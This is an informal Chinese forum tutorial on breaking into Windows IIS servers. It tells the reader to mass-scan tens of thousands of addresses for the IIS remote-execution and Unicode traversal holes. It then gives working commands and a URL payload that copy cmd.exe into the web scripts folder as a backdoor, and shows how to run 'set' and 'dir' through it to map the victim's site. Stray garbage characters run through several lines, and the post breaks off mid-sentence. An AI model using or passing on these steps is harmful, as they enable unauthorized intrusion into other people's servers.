【原创】入侵的一些手法
[b][color=darkred](这篇教程因为是随意之作没进行过整理,所以很希望各位能够看完,说不定在某个地方就能解决你经常思考的问题了)[/color][/b]先用流光(在iv FOR 2000/nt/xp的版本下) |B{ CQql$n R0z xB
一般我都是用SQL扫描(现在的流光都有IIS/PRONTPAGE扫描了,那就用这个),然后利用的是iis远程执行命令漏洞,这个漏洞你应该知道一般有这个漏洞就有U漏洞,但是有U漏洞不一定有这个漏洞,所以我一般都扫个2-3万台
(网段)比如111.111.1.1-111.111.100.255
然后就去干别的,运气再不好,也有个好多台。?)E9OY!F TX
然后呢?我的手法是这样的9q&S2tJ-A%eHVW(B:F
在IIS远程执行命令漏洞下(这个漏洞流光可以连接,其实就是U漏洞的各种类型,也就说你扫到U漏洞了用我以下写的手法一样非常容易入侵一台机器:),打入
copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\treasure.exe(如果是U漏洞在IE上打入:..../scripts/cmd.exe?/c+ copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\treasure.exe)
其实在IIS远程执行命令漏洞下我们一般能用到的DOS命令(常用的)
是set查看他的网站结构,dir查看上传情况(记的常用dir c:\xxx/s这个命令)f"CCg V6MY
(此时可以在IE上打入ip/scripts/treasure.exe?/c+set,很有成就感是吗?)v(ALF2}Kt
虽然很多时候用SET就能看到网站的WEB目录但是更多的时候还是要用到这个命令